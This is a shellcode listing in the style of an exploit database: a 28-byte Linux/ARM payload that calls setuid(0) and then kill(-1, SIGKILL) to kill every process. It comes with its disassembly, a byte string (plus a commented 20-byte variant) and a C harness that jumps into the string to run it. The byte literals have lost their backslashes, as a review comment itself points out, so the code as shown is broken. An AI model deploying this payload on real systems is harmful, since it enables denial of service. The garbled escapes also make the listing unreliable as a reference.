
# Title : Linux/ARM - setuid(0) & kill(-1, SIGKILL) - 28 bytes
# Published : 2010-06-29
# Author :


/*
Title:  Linux/ARM - setuid(0) & kill(-1, SIGKILL) - 28 bytes
	(Kill all processes)

Date:   2010-06-29
Tested: ARM926EJ-S rev 5 (v5l)

Author: Jonathan Salwan
Web:    http://shell-storm.org | http://twitter.com/jonathansalwan

! Database of shellcodes http://www.shell-storm.org/shellcode/


    8054:	e28f3001 	add	r3, pc, #1   ; 0x1
    8058:	e12fff13 	bx	r3
    805c:	1b24      	subs	r4, r4, r4
    805e:	1c20      	adds	r0, r4, #0
    8060:	2717      	movs	r7, #23
    8062:	df01      	svc	1
    8064:	1a92      	subs	r2, r2, r2
    8066:	1c10      	adds	r0, r2, #0
    8068:	3801      	subs	r0, #1
    806a:	2109      	movs	r1, #9
    806c:	2725      	movs	r7, #37
    806e:	df01      	svc	1

*/

#include <stdio.h>
#include <string.h>


/* kill all processes without setuid(0) - 20 bytes */

// char *SC = "x01x30x8fxe2"
//            "x13xffx2fxe1"
//            "x92x1ax10x1c"
//            "x01x38x09x21"
//            "x25x27x01xdf";


/*
 * kill all processes with setuid(0) - 28 bytes
 *
 * Byte string for the disassembly listed in the header comment. Each
 * instruction word is stored little-endian (e28f3001 -> 01 30 8f e2):
 *   - two ARM-mode instructions (add r3, pc, #1 / bx r3) that branch to the
 *     Thumb code that follows;
 *   - r0 = 0, r7 = 23, svc   -> the setuid(0) named in the title;
 *   - r0 = -1, r1 = 9, r7 = 37, svc -> the kill(-1, SIGKILL) named in the title.
 *
 * To a syscall auditor the sequence shows up as setuid with uid 0 followed by
 * kill with pid -1 and signal 9.
 *
 * NOTE(review): the escapes read "x01" rather than "\x01"; the backslashes
 * appear to have been lost when this page was extracted, so as written the
 * literal holds ASCII text, not the 28 bytes the heading gives. Confirm
 * against the original listing.
 */

char *SC = "x01x30x8fxe2"
           "x13xffx2fxe1"
           "x24x1bx20x1c"
           "x17x27x01xdf"
           "x92x1ax10x1c"
           "x01x38x09x21"
           "x25x27x01xdf";


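/*
 * Test harness: print the length of SC, then transfer control to it.
 *
 * Returns 0 only if control comes back from the call through SC.
 */
int main(void)
{
        /*
         * strlen() returns size_t, so the matching conversion is %zu; passing
         * it to %d is undefined behaviour. The count stops at the first NUL
         * byte, i.e. it is the C-string length of SC.
         */
        fprintf(stdout, "Length: %zu\n", strlen(SC));

        /*
         * Reinterpret the data pointer as a function pointer and call it.
         * ISO C does not define this conversion, and the call faults on any
         * system that maps string literals as non-executable memory.
         */
        ((void (*)(void))SC)();

        return 0;
}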